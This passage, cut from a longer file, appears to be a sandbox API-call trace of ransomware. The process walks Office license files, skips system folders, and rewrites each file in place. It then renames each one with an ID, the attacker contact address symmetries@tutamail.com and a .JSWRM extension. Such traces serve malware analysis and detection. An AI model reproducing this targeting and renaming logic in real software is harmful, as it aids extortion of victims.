lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0111.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0111.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0111.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0111.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0111.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.194] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeba8003e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeba8003e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebb64e83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTrial-pl.xrm-ms", cAlternateFileName="VISIOP~3.XRM")) returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.194] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0111.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0111.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0111.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.195] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0111.195] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.195] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.202] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.202] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.202] CloseHandle (hObject=0x45c) returned 1 [0111.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0111.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0111.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0111.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0111.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0111.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.204] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebded68f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebded68f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebeac256, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51bb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="VI80C5~1.XRM")) returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.204] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0111.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.205] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20923) returned 1 [0111.205] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0111.205] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0111.214] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.214] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0111.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.214] CloseHandle (hObject=0x45c) returned 1 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0111.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0111.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0111.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0111.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.215] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0111.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0111.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebded68f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebded68f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebfdd523, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="VI3058~1.XRM")) returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.216] lstrcmpiW (lpString1="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0111.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.217] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11628) returned 1 [0111.217] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.218] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, 